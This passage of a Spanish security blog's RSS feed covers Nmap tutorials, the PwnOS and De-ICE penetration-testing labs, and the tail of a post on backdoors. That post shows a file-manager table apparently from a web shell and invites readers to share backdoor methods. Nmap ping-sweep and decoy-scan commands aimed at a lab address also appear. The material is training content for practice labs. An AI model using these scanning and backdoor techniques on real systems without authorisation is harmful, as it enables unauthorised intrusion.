<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> copyright.txt </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>15 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> background.jpg </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>41 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> info.php </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>0 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
</tbody>
</table>
<p style="text-align: justify;">etc&#8230;</p>
<p style="text-align: justify;">Vuelvo y reitero la invitación a que los lectores compartan sus métodos para habilitar puertas traseras en sistemas.</p>
<p style="text-align: justify;">En futuros entornos conoceremos algunos métodos aún más avanzados que los presentados en este post realizado a modo de introducción a los Backdoors.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-backdoors-manteniendo-el-acceso/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Video tutorial: Identificación / Conectividad de Sistemas con Nmap</title>
		<link>http://www.sec-track.com/video-tutorial-identificacion-conectividad-de-sistemas-con-nmap</link>
		<comments>http://www.sec-track.com/video-tutorial-identificacion-conectividad-de-sistemas-con-nmap#comments</comments>
		<pubDate>Sun, 08 Nov 2009 00:53:37 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Videos]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Video]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=224</guid>
		<description><![CDATA[Una vez realizada la introducción sobre la herramienta Nmap en el video anterior, podemos comenzar a interactuar con esta. Nada mejor que comenzar por la etapa de identificación y reconocimiento del/los sistemas, tanto desde su conectividad como automatización del proceso, además de los puertos abiertos en el sistema. Video Tutorial Nmap from Sec-Track on Vimeo.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Una vez realizada la introducción sobre la herramienta Nmap en el video anterior, podemos comenzar a interactuar con esta. Nada mejor que comenzar por la etapa de identificación y reconocimiento del/los sistemas, tanto desde su conectividad como automatización del proceso, además de los puertos abiertos en el sistema.</p>
<p style="text-align: center;"><object width="400" height="300" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=7492758&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed width="400" height="300" type="application/x-shockwave-flash" src="http://vimeo.com/moogaloop.swf?clip_id=7492758&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" allowfullscreen="true" allowscriptaccess="always" /></object></p>
<p><a href="http://vimeo.com/7492758">Video Tutorial Nmap</a> from <a href="http://vimeo.com/user2489751">Sec-Track</a> on <a href="http://vimeo.com">Vimeo</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/video-tutorial-identificacion-conectividad-de-sistemas-con-nmap/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Tool: Nmap</title>
		<link>http://www.sec-track.com/tool-nmap</link>
		<comments>http://www.sec-track.com/tool-nmap#comments</comments>
		<pubDate>Sun, 08 Nov 2009 00:00:35 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Tools]]></category>
		<category><![CDATA[Hacking Tools]]></category>
		<category><![CDATA[Nmap]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=226</guid>
		<description><![CDATA[Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos TCP y UDP atribuido a Fyodor. Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática. Características Descubrimiento de servidores: Identifica computadoras en una red, por ejemplo listando aquellas que responden [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos TCP y UDP atribuido a Fyodor. Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.</p>
<p style="text-align: justify;"><strong>Características</strong></p>
<ul>
<li>Descubrimiento de servidores: Identifica computadoras en una red, por ejemplo listando aquellas que responden ping.</li>
<li>Identifica puertos abiertos en una computadora objetivo.</li>
<li>Determina qué servicios está ejecutando la misma.</li>
<li>Determinar qué sistema operativo y versión utiliza dicha computadora, (esta técnica es también conocida como fingerprinting).</li>
<li>Obtiene algunas características del hardware de red de la máquina objeto de la prueba.</li>
</ul>
<ul>
<li><a href="http://es.wikipedia.org/wiki/Nmap" target="_blank"><strong>Más información sobre Nmap</strong></a></li>
<li><strong><a href="http://nmap.org/download.html" target="_blank">Descargar Nmap</a></strong> (Windows – Linux – MacOSX – *BSD)</li>
<li><a href="http://nmap.org/man/es/" target="_blank"><strong>Guía de referencia en español de Namp</strong></a></li>
<li><a href="http://nmap.org/" target="_blank"><strong>Página Oficial de Namp</strong></a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/tool-nmap/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Video tutorial: Introducción a Nmap</title>
		<link>http://www.sec-track.com/video-tutorial-introduccion-a-nmap</link>
		<comments>http://www.sec-track.com/video-tutorial-introduccion-a-nmap#comments</comments>
		<pubDate>Sat, 07 Nov 2009 23:46:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Videos]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Video]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=221</guid>
		<description><![CDATA[Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos TCP y UDP atribuido a Fyodor. Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática. (Más información&#62;&#62;) Página oficial de Nmap &#62;&#62;]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos TCP y UDP atribuido a Fyodor. Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática. (<a href="http://es.wikipedia.org/wiki/Nmap" target="_blank"><strong>Más información&gt;&gt;</strong></a>)</p>
<p style="text-align: center;"><object width="425" height="344" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/oEqVSfTUp0E&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=es&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><embed width="425" height="344" type="application/x-shockwave-flash" src="http://www.youtube.com/v/oEqVSfTUp0E&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=es&amp;feature=player_embedded&amp;fs=1" allowFullScreen="true" allowScriptAccess="always" allowfullscreen="true" allowscriptaccess="always" /></object></p>
<p style="text-align: justify;"><a href="http://nmap.org/" target="_blank"><strong>Página oficial de Nmap &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/video-tutorial-introduccion-a-nmap/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Video tutorial: Desarrollo del Entorno De-Ice nivel I &#8211; Network Mapping, Port Scanning</title>
		<link>http://www.sec-track.com/video-tutorial-desarrollo-del-entorno-de-ice-nivel-i-network-mapping-port-scanning</link>
		<comments>http://www.sec-track.com/video-tutorial-desarrollo-del-entorno-de-ice-nivel-i-network-mapping-port-scanning#comments</comments>
		<pubDate>Wed, 28 Oct 2009 07:35:01 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Fingerprint]]></category>
		<category><![CDATA[NetDiscover]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[O.S Fingerprint]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Port Scanning]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=216</guid>
		<description><![CDATA[Video tutorial de desarrollo del entorno De-Ice nivel I, Network Mapping, Port Scanning. En este corto video tutorial presento varios métodos para llevar a cabo un mapeo de red y escaneo de puertos básicos desde BackTrack con la finalidad de que las personas que recién inician en el desarrollo de estos entornos tengan unas bases [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Video tutorial de desarrollo del entorno <a href="http://www.sec-track.com/de-ice-pentest-livecds-nivel-i" target="_blank"><strong>De-Ice nivel I</strong></a>, Network Mapping, Port Scanning.</p>
<p style="text-align: justify;">En este corto video tutorial presento varios métodos para llevar a cabo un mapeo de red y escaneo de puertos básicos desde <a href="http://remote-exploit.org/backtrack.html" target="_blank"><strong>BackTrack </strong></a>con la finalidad de que las personas que recién inician en el desarrollo de estos entornos tengan unas bases para comenzar con el cumplimiento de los objetivos propuestos.</p>
<p style="text-align: justify;">La idea es que una vez visualizado este video tutorial, los interesados continuen y propongan nuevas maneras de cumplir con los objetivos del mismo.</p>
<p style="text-align: justify;">En este video tutorial veremos:</p>
<ul style="text-align: justify;">
<li>Identificación de la dirección IP de nuestro sistema (<a href="http://es.wikipedia.org/wiki/Ifconfig" target="_blank"><strong>ifconfig</strong></a>)</li>
<li>Identificación de hosts &#8220;vivos&#8221; o conectados en nuestra red con <a href="http://nixgeneration.com/~jaime/netdiscover/" target="_blank"><strong>netdiscover</strong></a>.</li>
<li>Verificación del estado de conectividad con el comando <a href="http://es.wikipedia.org/wiki/Ping" target="_blank"><strong>ping</strong></a> (ping 192.168.1.100)</li>
<li>Barrido de Pings con <a href="http://nmap.org/" target="_blank"><strong>Nmap</strong></a> (nmap -sP 192.168.1.*)</li>
<li>Port Scanning e identificación de servicios y Sistema Operativo con <a href="http://nmap.org/" target="_blank"><strong>Nmap</strong></a> y método Decoy (nmap -sV -D 192.168.1.100 -p 21,22,25,80,3306,1521 192.168.1.100)</li>
</ul>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="300" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=7303884&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed type="application/x-shockwave-flash" width="400" height="300" src="http://vimeo.com/moogaloop.swf?clip_id=7303884&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><a href="http://vimeo.com/7303884">Video tutorial: Desarrollo De-Ice nivel I &#8211; Network Mapping, Port Scanning</a> from <a href="http://vimeo.com/user2489751">Sec-Track</a> on <a href="http://vimeo.com">Vimeo</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/video-tutorial-desarrollo-del-entorno-de-ice-nivel-i-network-mapping-port-scanning/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>PwnOS</title>
		<link>http://www.sec-track.com/pwnos</link>
		<comments>http://www.sec-track.com/pwnos#comments</comments>
		<pubDate>Wed, 07 Oct 2009 23:42:54 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Medusa]]></category>
		<category><![CDATA[Nessus]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[NetDiscover]]></category>
		<category><![CDATA[Network Mapping]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[OSSTMM]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Port Scanning]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[Vulnerability Scanning]]></category>
		<category><![CDATA[Xhydra]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=16</guid>
		<description><![CDATA[Escenario: Un empresa dedicada al servicio de Webhosting te contrata para realizar un Test de Penetración en uno de sus servidores dedicados a la administración de sus sistemas. Dicho servidor se encuentra en una de sus redes xxx.xxx.xxx.xxx. El objetivo consiste en identificar dicho servidor, descubrir y analizar las vulnerabilidades existentes en el mismo y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Escenario:</strong> Un empresa dedicada al servicio de Webhosting te contrata para realizar un Test de Penetración en uno de sus servidores dedicados a la administración de sus sistemas.<br />
Dicho servidor se encuentra en una de sus redes xxx.xxx.xxx.xxx.</p>
<p style="text-align: justify;">El objetivo consiste en identificar dicho servidor, descubrir y analizar las vulnerabilidades existentes en el mismo y penetrar el sistema.</p>
<p style="text-align: justify;"><strong>Categoría:</strong> Fundamentación, Test de Penetración, Explotación de vulnerabilidades.</p>
<p style="text-align: justify;"><strong>Nivel de Dificultad:</strong> Medio / Alto</p>
<p style="text-align: justify;"><strong>Formato:</strong> Imágen VMWare</p>
<p style="text-align: justify;"><strong>Objetivos/Técnicas: </strong>Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Informacion Confidencial.</p>
<p style="text-align: justify;"><strong>Herramientas/Recursos: <a href="http://www.isecom.org/osstmm/" target="_blank">OSSTMM</a></strong></p>
<p style="text-align: justify;"><strong>Configuracion:</strong> El router/tarjeta de red virtual/fisica debe tener DHCP activo.</p>
<p style="text-align: justify;"><strong>Descargar (<a href="http://www.adrive.com/public/0da911443f10d5bdcc9d35644f9c2b935df9d2e8823b02597661731be1622991.html" target="_blank">Imágen VMWare</a>)<br />
</strong></p>
<p style="text-align: justify;"><strong>MD5:</strong></p>
<p style="text-align: justify;"><strong>Autor / Página Oficial / Más Información:</strong> <a href="http://www.0dayclub.com" target="_blank">www.0dayclub.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/pwnos/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>De-ICE PenTest LiveCDs (Nivel I)</title>
		<link>http://www.sec-track.com/de-ice-pentest-livecds-nivel-i</link>
		<comments>http://www.sec-track.com/de-ice-pentest-livecds-nivel-i#comments</comments>
		<pubDate>Wed, 07 Oct 2009 23:39:18 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Medusa]]></category>
		<category><![CDATA[Nessus]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[NetDiscover]]></category>
		<category><![CDATA[Network Mapping]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[OSSTMM]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Port Scanning]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[Vulnerability Scanning]]></category>
		<category><![CDATA[Xhydra]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=9</guid>
		<description><![CDATA[Escenario: Un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus).]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Escenario:</strong> Un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus).<br />
Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le da un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.<br />
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.</p>
<p>El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.</p>
<p style="text-align: justify;"><strong>Categoría:</strong> Fundamentación, Test de Penetración</p>
<p style="text-align: justify;"><strong>Nivel de Dificultad:</strong> Bajo</p>
<p style="text-align: justify;"><strong>Formato:</strong> .ISO / Imágen VMWare</p>
<p style="text-align: justify;"><strong>Objetivos/Técnicas: </strong>Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Información Confidencial.</p>
<p style="text-align: justify;"><strong>Herramientas/Recursos: <a href="http://www.isecom.org/osstmm/" target="_blank">OSSTMM</a></strong> / <strong><a href="http://nmap.org/" target="_blank">Nmap</a></strong> /<strong><a href="http://freeworld.thc.org/" target="_blank"> Xhydra</a></strong> / <strong><a href="http://netcat.sourceforge.net/" target="_blank">Netcat</a></strong> / <strong><a href="http://www.foofus.net/jmk/medusa/medusa.html" target="_blank">Medusa</a></strong> / <strong><a href="http://netdiscover.sourceforge.net/" target="_blank">NetDiscover</a></strong> / <strong><a href="http://www.nessus.org/" target="_blank">Nessus</a></strong></p>
<p style="text-align: justify;"><strong>Configuracion:</strong> Este entorno esta configurado para que de manera automática obtenga la dirección IP  192.168.1.100. El router/tarjeta de red virtual/física debe tener DHCP activo, la dirección de inicio debe ser 192.168.1.2 y la máscara de subred 255.255.255.0</p>
<p style="text-align: justify;"><strong>Descargar (<a href="http://www.adrive.com/public/d5dc5d5dd7eec2d5ee6051d3d5ab235f5c8273357169e8dd6b01069fc5e4c51f.html" target="_blank">ISO</a>)<br />
</strong></p>
<p style="text-align: justify;"><strong>MD5:</strong> a3341316ca9860b3a0acb06bdc58bbc1</p>
<p style="text-align: justify;"><strong>Autor / Página Oficial / Mas Información:</strong> <strong><a href="http://www.heorot.net" target="_blank">www.Heorot.net</a></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/de-ice-pentest-livecds-nivel-i/feed</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Served from: www.sec-track.com @ 2012-02-05 11:17:09 -->
